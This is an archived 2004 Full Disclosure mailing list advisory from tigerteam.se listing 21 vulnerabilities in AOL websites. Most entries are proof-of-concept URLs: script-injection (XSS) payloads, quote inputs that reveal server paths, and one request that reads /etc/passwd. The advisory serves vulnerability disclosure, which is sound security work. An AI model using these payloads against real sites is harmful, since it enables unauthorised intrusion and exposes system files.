Full Disclosure mailing list archives

Multiple vulnerabilities in AOL and AOL affiliate web sites


From: Michel Blomgren <michel.blomgren () tigerteam se>
Date: Sun, 26 Dec 2004 18:58:57 +0100


              tigerteam.se security advisory - TSEAD-200412-2
                              www.tigerteam.se

     Advisory: Multiple vulnerabilities in AOL and AOL affiliate web sites
         Date: Sat Dec 18 15:47:40 EST 2004
  Application: Multiple AOL web applications were found to be vulnerable
Vulnerability: XSS, Path disclosure, and system file read access
               vulnerabilities
    Reference: TSEAD-200412-2
       Author: Xavier de Leon <xavier () tigerteam se>


SYNOPSIS

http://www.corp.aol.com/whoweare/mission.shtml


VULNERABILITY

The AOL and AOL affiliate web sites have similar coding practices in some
specific cases, and suffer from the same or similar vulnerabilities.


COMMENT 

I literally went link to link, choosing scripts at random and manually testing
for input validation bugs, XSS, and so on. And so I assume the number of bugs
is actually greater.


DISCOVERY

Xavier de Leon <xavier () tigerteam se>


EXPLOITATION

1) Description: multiple XSS attacks in "report.adp" script:
   Attack: a) 
http://www.aim.com/help_faq/report.adp?type=><script>alert("fubar")</script>
           b) 
http://www.aim.com/help_faq/report.adp?plat=><script>alert("fubar")</script>
           c) 
http://www.aim.com/help_faq/report.adp?num=><script>alert("fubar")</script>
           d) 
http://www.aim.com/help_faq/report.adp?ver=><script>alert("fubar")</script>
           e) 
http://www.aim.com/help_faq/report.adp?aolp=><script>alert("fubar")</script>

2) Description: XSS attack in help_faq/starting_out's "index.asp" script:
   Attack: a) 
http://www.aim.com/help_faq/starting_out/index.adp?aolp=><script>alert("fubar")</script>

3) Description: XSS attack in "catId" variables on multiple .adp scripts:
   Attack: a) 
http://help.channels.aol.com/article.adp?catId=";><script>alert("fubar")</script>&articleId=0
           b) 
help.channels.aol.com/topic.adp?catId="><script>alert("fubar")</script>&sCId=0

4) Description: Input validation attacks and path disclosure in "file_id"
   variable over multiple scripts:
   Attack: a) http://downloads.aol.com.br/files/incr.php?file_id=-0
           b) http://downloads.aol.com.br/arquivo.php?file_id=(

5) Description: Input validation attacks and path disclosure in
   "busca_resultado.php" script:
   Attack: a) http://downloads.aol.com.br/busca_resultado.php?search_string=&apos;

6) Description: Input validation attacks and path disclosure in
   "subcategoria.php" script:
   Attack: a) http://downloads.aol.com.br/subcategoria.php?cat_subs_id=&apos;

7) Description: Path disclosure in "wa" script, part of listserv package.
   Attack: a) http://listserv.aol.com/cgi-bin/wa?A2=/bar&L=foo&P=R1

8) Description: XSS attack in "main_redesign.adp" script:
   Attack: a) 
http://aimtoday.aol.com/features/main_redesign.adp?fid=";><script>alert("fubar")</script>
 
9) Description: XSS attack in "price_plan.adp" script:
   Attack: a) 
http://www.aol.ca/tryaol/price_plan.adp?wr_promo=&brand=";><script>alert("fubar")</script>
           b) 
http://www.aol.ca/tryaol/price_plan.adp?wr_promo=";><script>alert("fubar")</script>&brand=

10) Description:  XSS and Path disclosure attack in "object.adp" script:
    Attack: a) 
http://finance.channels.aol.ca/finance/object.adp?channel=&frame=&type=&id=---!><script>alert("fubar")</script><!---&data&title=
            b) 
http://women.channels.aol.ca/preview/object.adp?frame=&type=&id=---!><script>alert("fubar")</script><!---&data=
            c) 
http://sports.channels.aol.ca/sports/object.adp?channel=&frame=&type=&id=---!><script>alert("fubar")</script><!---&data&title=

11) Description: Path disclosures in multiple aol.com.ar scripts:
    Attack: a) http://foros.aol.com.ar/foro.php3?id_foro=&apos;
            b) http://foros.aol.com.ar/toplevel.php3?id_top=&apos;
            c) http://foros.aol.com.ar/categorias.php3?id_cat=&apos;
            d) http://foros.aol.com.ar/subcategoria.php3?id_subcat=&apos;

12) Description: XSS attacks in "zonalibre.adp" script:
    Attack: a) 
http://aol.com.ar/CanalesWeb/zonalibre.adp?Canal=&Id=";><script>alert("fubar")</script><!---
            b) 
http://aol.com.ar/CanalesWeb/zonalibre.adp?Canal=<script>alert("fubar")</script>&Id=

13) Description: XSS attacks in "computacion.adp" script:
    Attack: a) 
http://www.aol.com.ar/CanalesWeb/computacion.adp?Canal=<script>alert("fubar")</script>&ID=
            b) 
http://www.aol.com.ar/CanalesWeb/computacion.adp?Canal=&ID=";><script>alert("fubar")</script><!---

14) Description: XSS attack in "aolenvivo.adp" script:
    Attack: a) 
http://www.aol.com.ar/CanalesWeb/aolenvivo.adp?Canal=<script>alert("fubar")</script>&ID=

15) Description: XSS attack in "noticias.adp" script:
    Attack: a) 
http://aol.com.ar/CanalesWeb/noticias.adp?Canal=<script>alert("fubar")</script>&Id=

16) Description: XSS attack in "musica.adp" script:
    Attack: a) 
http://aol.com.ar/CanalesWeb/musica.adp?Canal=<script>alert("fubar")</script>&Id=

17) Description: XSS attack in "deportes.adp" script:
    Attack: a) 
http://www.aol.com.ar/CanalesWeb/deportes.adp?Canal=<script>alert("fubar")</script>&ID=

18) Description: XSS attack in "entretenimientos.adp" script:
    Attack: a) 
http://www.aol.com.ar/CanalesWeb/entretenimientos.adp?Canal=<script>alert("fubar")</script>&ID=

19) Description: System file read access vulnerability in "index.adp" script:
    Attack: a) http://www.aol.com.ar/Goyeneche/index.adp?page=/etc/passwd

20) Description: Path disclosure and XSS attack in "holidaydetails.asp"
    script:
    Attack: a) 
http://travel.aol.com.au/holidays/holidaydetails.asp?HolidayId=&apos;
    Attack: b) 
http://travel.aol.com.au/holidays/holidaydetails.asp?HolidayId=";><script>alert("fubar")</script><!---

21) Description: Path disclosure attacks in "flightreturnsearch.asp" script:
    Attack: a) 
http://travel.aol.com.au/flights/flightreturnsearch.asp?FLTStartDate1Month=&apos;
            b) 
http://travel.aol.com.au/flights/flightreturnsearch.asp?FLTEndDate1Month=&apos;


ACKNOWLEDGMENTS

I would like to thank the following people in no particular order:
Michel + all my brothers in p-e and uDc, you know who you are.


ABOUT TIGERTEAM.SE

tigerteam.se offers spearhead competence within the areas of vulnerability
assessment, penetration testing, security implementation, and advanced ethical
hacking training. tigerteam.se consists of Michel Blomgren - company owner (M.
Blomgren IT Security) and Xavier de Leon - freelancing IT security consultant.
Together we have worked for organizations in over 15 countries.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: